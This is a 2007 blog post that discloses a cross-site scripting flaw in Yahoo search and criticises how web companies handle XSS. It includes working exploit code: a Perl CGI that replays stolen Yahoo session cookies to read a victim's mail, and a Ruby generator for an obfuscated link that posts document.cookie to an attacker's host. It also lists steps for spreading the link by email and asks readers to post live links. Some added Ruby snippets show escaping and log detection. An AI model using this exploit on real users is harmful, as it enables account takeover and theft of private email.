Thursday, June 14, 2007

Yahoo defect endangers users -- do web sites care?

Summary:
  • Critical cross-site scripting (XSS) defect in Yahoo services is discovered
  • Proof of concept of exploit is included
  • XSS bugs are on the rise because of web 2.0+
  • The web industry is mostly negligent about dealing with XSS

XSS Defects


"I used to act dumb. That act is no longer cute." This is what the re-jailed Paris Hilton said to Barbara Walters from behind penis-painted bars last Sunday. And with these words, Paris demonstrated that she is smarter and has more class than the web sites you have come to rely on every day. This doesn't say much about Paris, but it says a hell of a lot about the billion-dollar companies that safeguard your data and identity.

Who else should be putting an end to the dumb act? How about Yahoo, the number one provider of email in the universe, with over 250 million users worldwide?

Every day, hundreds of defects known as "cross-site scripting," or XSS for short, are discovered on web sites. (This is not even counting all those that don't get disclosed.) And the peanut-butter-eating yahoos in Yahoo's development organization are not immune to coding up such so-called XSS bugs.

"Cross-site scripting" is the top security risk facing the web today. The biggest danger is that so few web sites actually care enough to guard against it; and those that do care, like the big internet companies (Yahoo, Google, AOL), often make mistakes. And a single mistake can be devastating to vast numbers of users.

XSS Demonstration at Yahoo! Mail

Allow me to demonstrate how dangerous XSS can be. Let’s imagine you’re checking your Yahoo Mail and you see an interesting email, maybe one from a friend of yours or one that peddles medication for the enlargement of your ears. Inside the email is contained an innocuous-looking link that looks like a Yahoo search page, something like http://search.yahoo.com/web/advanced?ei=UTF-8&p=%22%3E.... You click on it... Now why the hell did you do that? You are now screwed.

That’s right: an attacker would now have complete access to your Yahoo account. All because you clicked on one link.

This is not fantasy. The simple code to take over anyone's Yahoo account is included at the bottom of this article. If you were to visit this naughty link, your web browser would show the last email in your inbox displayed on a web site that is not part of Yahoo. What the simple link does is allow a program to navigate through your email account pretending to be you and download emails onto the attacker's web site, allowing them to read all your conversations with that iheartsanjaya3 you met on myspace.

But that's not all that could happen. The attacking program could obtain your entire address book, supplementing spammers' lucrative database of spam victims. And thanks to Yahoo's recent integration of instant messaging within its web-mail site, it could also send instant messages to your friends impersonating you. ("You wanna do what to me?!") Many of your online accounts would then become vulnerable as well, since the attacker would have access to your password-resetting emails; this potentially means access to your financial accounts. All other Yahoo services that you use are also at risk, including Yahoo Photos or Flickr.

Worst of all, the simple act of clicking that link could allow an attacker to automatically send emails or instant messages as you to all your contacts containing the very same link, thus rapidly spreading the attack through your social network in a devastating epidemic known in the industry as a "worm." Within hours, millions of users’ accounts could be compromised.
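The defect behind that link is a reflected search term written into the page unescaped. Here is an added illustration, not code from this post or from Yahoo, in Ruby: it decodes the `p` parameter from a constructed link of the same shape as the one above, renders the term the vulnerable way and the escaped way, and checks which rendering grew an extra tag. The onerror body in the constructed link is a harmless placeholder.

```ruby
require 'cgi'

# Constructed link in the shape the post describes; the onerror body is a
# harmless placeholder, not the post's real payload.
SAMPLE_LINK = 'http://search.yahoo.com/web/advanced?ei=UTF-8' \
              '&p=%22%3E%3Cimg%20src=14%20onerror=eval(String.fromCharCode(104,105))%3E' \
              '&y=Search&fr=yfp-t-501'

# The search term as the server sees it after percent-decoding the query.
def search_term(link)
  query = link.split('?', 2)[1].to_s
  CGI.parse(query).fetch('p', []).first.to_s
end

# Vulnerable rendering: the term is pasted straight into the value attribute,
# so a term that starts with "> closes the attribute and the tag.
def render_search_vulnerable(term)
  %(<input name="p" value="#{term}">)
end

# Hardened rendering: HTML-escape every reflected value. In an attribute
# context, escaping the quote is what keeps the term inside the attribute.
def render_search_hardened(term)
  %(<input name="p" value="#{CGI.escapeHTML(term)}">)
end

# Names of the tags present in the markup; the template contributes exactly
# one <input>, so anything else came from the reflected term.
def tags_in(html)
  html.scan(/<([a-z]+)/i).flatten.map(&:downcase)
end

def injected_tag?(html)
  tags_in(html) != ['input']
end

if __FILE__ == $PROGRAM_NAME
  term = search_term(SAMPLE_LINK)
  puts "vulnerable: #{tags_in(render_search_vulnerable(term)).inspect}"  # ["input", "img"]
  puts "hardened:   #{tags_in(render_search_hardened(term)).inspect}"    # ["input"]
end
```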

Web Developer Ignorance and Web Company Complacency

Given how painful a "cross-site scripting" attack can be, its acronym should have been "ASS" instead of "XSS". Yet the developers behind the web applications you use every day often do not know what they are or do not care.

Why don’t web sites care enough? Because on the surface these vulnerabilities do not jeopardize the security of the entire company and such hacks are not as glamorous as high-profile break-ins where millions of social security numbers are stolen. But in reality, an XSS defect can be just as devastating to a site’s user base and extremely traumatic to any single user whose identity and privacy are violated.

Web developers are not keeping up with the increasing risks. While awareness of the risks of XSS and other dangers such as "Cross-Site Request Forgery" (CSRF) is on the rise, there are still many key developers who have never heard of these errors. Blame lack of developer training. The fact is that no developer should be allowed to touch code for a web site without undergoing a thorough education in protecting users from XSS. But the current situation is that web companies assume that their developers are "smart" enough to guard against it. The reality is that this is not a question of smarts, but a question of education and code review process, which are lacking on the web today.

There are a number of disturbing trends that are making the problem worse. The first is the constant push for the integration of many web services behind a single login. Because web conglomerates such as Yahoo and Google offer so many services under one roof, the chance that at any given time one of hundreds of doors has been left unlocked has reached unacceptable levels. The online privacy and security of users hang precariously on a house of cards.

The second exacerbating trend is the world of "user-generated content" (UGC). In today's web 2.0, users are often allowed to generate content for a web site that other users will see. It's now very easy for hackers to find ways to implant malicious exploits in pages that innocent viewers will load.

Yet another trend is that applications are moving from the desktop to the web, as exemplified by Google Docs & Spreadsheets.

Next steps

Will the situation improve? It's up to the web companies to train their web developers and to institute processes to make sure that web application vulnerabilities like XSS and CSRF don't endanger their users.

As for users, your online privacy and security are always at risk. At any given moment, you can lose both, through no fault of your own.


Exploit Code


An attack is frighteningly easy to carry out.


  1. You find a hosting company to run your Perl CGI script
  2. You install the code listed below on your web site
  3. You take the address that points to that CGI script and run it through the Ruby script included below in order to generate a link to Yahoo's XSS vulnerability
  4. You send out emails with that link to your best friend, or everyone on Yahoo if you're a loser and have no friends

Note: if you happen to be able to host this script and want to show everyone the proof of concept in action, please post a comment to this article with your generated link to the Yahoo XSS exploit.


Code to be hosted:


#!/usr/bin/perl

use CGI;
use CGI::Carp qw(fatalsToBrowser);
use URI::Escape;
use HTTP::Cookies;
use HTML::Entities;
use LWP::UserAgent;

$q = new CGI;

print "Content-type: text/html\n\n";

$cookies = uri_unescape($q->param('x'));
@cookies = split(/; /, $cookies);

$cj = HTTP::Cookies->new;

foreach $c (@cookies) {
    $c =~ /^([^=]+)=(.*)$/;
    $k = $1; $v = $2;
    $cj->set_cookie('', $k, $v, "/", "yahoo.com");
}

$ua = LWP::UserAgent->new;
$ua->cookie_jar($cj);
$ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4');

$r = $ua->simple_request(HTTP::Request->new(GET => "http://mail.yahoo.com/"));
$r->header('Location') =~ /https?:\/\/([^\/]+)/;
$host = $1;

$r = $ua->get("http://$host/ym/ShowFolder?rb=Inbox");
if (!($r->content =~ /<a[^>]+id="folderviewmsg0subjlink"[^>]+href="([^"]+)/is)) {
    $url = "http://$host/ws/mail/v1/formrpc?m=ListMessages&appid=YahooMailRC&fid=Inbox&transform-markup=remove-javascript&startMid=0&numMid=300&startInfo=0&numInfo=30&sortKey=date&sortOrder=down";
    $r = $ua->get($url);
    $r->content =~ /<url>\s*([^>]+)\s*/si;

    $r = $ua->get(decode_entities($1));
    $r->content =~ /<mid>(.+?)<\/mid>/si;
    $mid = $1;
    $url = "http://$host/ws/mail/v1/formrpc?m=GetMessage&appid=YahooMailRC&fid=Inbox&message(0)-mid=$mid&message(0)-enableWarnings=true&message(0)-expandCIDReferences=true&message(0)-blockImages=all&truncateAt=1024000&transform-markup=remove-javascript&wssid=yr7G07oSPsarq&amp;r=0.655461233731633";
    $r = $ua->get($url);
    if ($r->content =~ /<url>\s*([^<]+)\s*/si)
    {
        $r = $ua->get(decode_entities($1));
    }
    if ($r->content =~ /<part[^>]+subtype="html"[^<]+<text>(.+?)<\/text/si) {
        print decode_entities($1);
    } elsif ($r->content =~ /<part[^>]+type="text"[^<]+<text>(.+?)<\/text/si) {
        print decode_entities($1);
    }
} else {
    $r = $ua->get("http://$host$1&PRINT=1");
    $r->content =~ /(<div id="message.+?<\/div>)\s*<script>/si;
    print $1;
}


Code to generate Yahoo XSS exploit link:


#!/usr/bin/ruby

PATH_TO_CGI_SCRIPT = 'http://yourhostingsite.com/scriptname.cgi'

x = %Q{
f=document.forms[0];f.method='POST';f.action='#{PATH_TO_CGI_SCRIPT}';f.x.value=document.cookie;f.submit()
}

s = %q{http://search.yahoo.com/web/advanced?ei=UTF-8&p=%22%3E%3Cimg%20src=14%20onerror=eval(String.fromCharCode(}
s += x.strip.split(//).map{|s|s[0]}.join(",")
s += %q{))%3E&y=Search&fr=yfp-t-501}

puts s
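Links built the way the generator above builds them leave a recognizable trace in a site's access logs: a percent-encoded tag, an inline event handler and a String.fromCharCode call inside a query parameter. As an added example (not the post's code), here is a small Ruby log scanner run over constructed Apache-style lines; it decodes each request's query string and reports which indicators fire, and it shows that a plain "<" in a benign search (a<b) does not trip it.

```ruby
require 'cgi'

# Constructed access-log lines in Apache combined style, not real Yahoo logs.
# Line 1 is the post's link shape with a harmless placeholder onerror body.
ACCESS_LOG = [
  '10.0.0.5 - - [14/Jun/2007:10:01:02 -0700] "GET /web/advanced?ei=UTF-8&p=yahoo+mail+help&y=Search HTTP/1.1" 200 8120',
  '10.0.0.9 - - [14/Jun/2007:10:01:07 -0700] "GET /web/advanced?ei=UTF-8&p=%22%3E%3Cimg%20src=14%20onerror=eval(String.fromCharCode(104,105))%3E&y=Search HTTP/1.1" 200 8144',
  '10.0.0.7 - - [14/Jun/2007:10:02:11 -0700] "GET /web/advanced?p=a%3Cb+comparison HTTP/1.1" 200 7990'
].freeze

# Each indicator is matched against the percent-decoded query string. The tag
# check requires a closing ">" so a bare "<" in ordinary text is not enough.
INDICATORS = {
  'html tag in parameter'  => /<\s*[a-z][^>]*>/i,
  'inline event handler'   => /\bon[a-z]+\s*=/i,
  'obfuscated script body' => /String\.fromCharCode|eval\s*\(/i
}.freeze

# Decoded query string of the request in one log line ('' if there is none).
def decoded_query(line)
  path = line[/"(?:GET|POST) (\S+) HTTP\//, 1].to_s
  CGI.unescape(path.split('?', 2)[1].to_s)
end

# Names of the indicators that fire for one log line.
def xss_indicators(line)
  q = decoded_query(line)
  INDICATORS.select { |_, re| q.match?(re) }.keys
end

# [line, indicators] for every request that trips at least one indicator.
def suspicious_requests(lines)
  lines.map { |l| [l, xss_indicators(l)] }.reject { |_, hits| hits.empty? }
end

if __FILE__ == $PROGRAM_NAME
  suspicious_requests(ACCESS_LOG).each do |line, hits|
    puts "#{line[/^\S+/]} -> #{hits.join(', ')}"
  end
end
```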


- Rarely Greys <rarely.greys at (Google's mail)>

